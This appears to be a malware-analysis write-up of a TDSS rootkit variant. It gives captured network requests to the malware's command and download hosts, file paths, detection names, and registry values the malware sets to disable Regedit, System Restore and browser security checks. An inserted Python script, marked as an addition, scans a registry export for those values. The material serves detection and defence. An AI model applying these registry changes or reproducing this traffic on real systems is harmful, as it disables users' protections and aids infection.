New TDSS variants install plenty of software
We analyzed a recent TDSS sample and noticed that, during the infection, it installed plenty of software and backdoors on the infected system. Besides the rogue security software, this time named Antivirus Scan, it also installed FLVTube Player, Sweetim Pack, Vista Cookies Collector, OfferBox, DataMngr, SweetIE, SweetIM and Fun4IM. TDSS installing FLVTube Player is nothing new, but this is the first time we have seen it install all the other instant-messenger related software as well.

One of the first pieces of software installed by TDSS is named Antivirus Scan; it is another rogue security product that alerts the user with false security warnings and fake detected files.

Network traffic:
GET /percer.php?login=ODQuMA== HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: afantispy .com

GET /check?pgid=8 HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: afantispy .com
FLVTube Player is downloaded from:
GET /FLV/FLVTubePlayerSetup.exe HTTP/1.1
Host: download.feelviatubbo .biz

This POST query:
POST / HTTP/1.0
Host: gbsup .com
generated a MySQL connection error in:
C:\Documents and Settings\kjjdhhht\My Documents\Programs\apache\htdocs\cyserv\includes\functions.php
Fake security alerts: (screenshot)

Rootkit activity: (screenshot)

Kernel driver is located at:
C:\WINDOWS\system32\drivers\zeljqasas.sys

Rootkit detections:
a-squared 19/12/2010 5.0.0.20 Gen.Variant.Taterf!IK
Avira AntiVir 19/12/2010 7.6.0.59 TR/Crypt.ZPACK.Gen
BitDefender 19/12/2010 7.0.0.2555 Gen:Variant.Taterf.21
Ikarus T3 19/12/2010 1001084 Gen.Variant.Taterf
AppInit_DLLs: (screenshot)

Files in Temp Folder: (screenshot)

OfferBox installed files: (screenshot)

Fun4IM installed files: (screenshot)

Searchqu MediaBar installed files: (screenshot)

Drvmsdll46 folder content: (screenshot)

Regedit is disabled: (screenshot)

Ring3 Hooks: (screenshot)

Hosts file is hijacked: (screenshot)

HKCU Run: (screenshot)

HKLM Run: (screenshot)

Running processes: (screenshot)

From this last image of running processes we can see that the Internet Explorer process IEXPLORE.EXE is running; it was launched by one of the active malware components to open various porn related web pages, in particular:


There is also an unstable executable that keeps running: (screenshot)

System hijacks:
Value: DisableRegistryTools
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System

Value: DisableSR
Data: 1
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore

Value: LowRiskFileTypes
Data: .exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations

Value: ShowSuperHidden
Data: 0
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Value: FirstRunDisabled
Data: 1
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center

Value: Enabled
Data: 0
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter

Value: CheckExeSignatures
Data: no
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download

Value: RunInvalidSignatures
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
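As an added example (not part of the original post), the following Python script checks a Regedit export for exactly the registry changes listed above, so a defender can confirm a machine carries the same tampering; it assumes the .reg file was produced on the suspect box with `reg export`, and the SAMPLE_REG content is constructed for the demonstration.

```python
import re

TDSS_HIJACKS = [  # (key, value name, data the malware sets), copied from the post
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", 1),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore", "DisableSR", 1),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", ".exe"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", 0),
    (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center", "FirstRunDisabled", 1),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter", "Enabled", 0),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download", "CheckExeSignatures", "no"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download", "RunInvalidSignatures", 1),
]
# Constructed sample of a Regedit export (.reg); three of the eight changes are present.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
"LowRiskFileTypes"=".zip;.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download]
"CheckExeSignatures"="yes"
"RunInvalidSignatures"=dword:00000001
'''
def parse_reg_export(text):
    """Parse a .reg export into {key: {name: data}}: dword:XXXXXXXX -> int, "text" -> str."""
    keys, values = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):   # [HKEY_...] opens a new key
            values = keys.setdefault(line[1:-1], {})
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)           # "Name"=data
        if m and values is not None:
            raw = m.group(2)
            values[m.group(1)] = int(raw[6:], 16) if raw.startswith("dword:") else raw.strip('"')
    return keys

def find_tdss_hijacks(reg):
    """(key, value, data) for each entry on the post's list; case-insensitive like the registry."""
    folded = {k.lower(): {n.lower(): d for n, d in v.items()} for k, v in reg.items()}
    hits = []
    for key, name, bad in TDSS_HIJACKS:
        data = folded.get(key.lower(), {}).get(name.lower())
        if data is None:
            continue
        # LowRiskFileTypes is a ';'-separated list, so ".exe" is matched by membership
        matched = (bad in [e.strip().lower() for e in str(data).split(";")]
                   if name == "LowRiskFileTypes" else str(data).lower() == str(bad).lower())
        if matched:
            hits.append((key, name, data))
    return hits
```

Run it on a real export with `find_tdss_hijacks(parse_reg_export(open("export.reg", encoding="utf-16").read()))`, since Regedit writes .reg files as UTF-16.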
Browser Helper Objects:
Value: juaw98rajewifhausihuggdd
Data: C:\WINDOWS\system32\fha6whi4fx.dll
CLSID: {B1B220C1-A503-59BD-F413-02B53A2C8954}
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
TCP connections during analysis:
Strange network traffic:
POST /+10740.html HTTP/1.1
CB2: 1
User-Agent: Mozilla
Host: 92.115.96.123

HTTP/1.0 200 OK
YES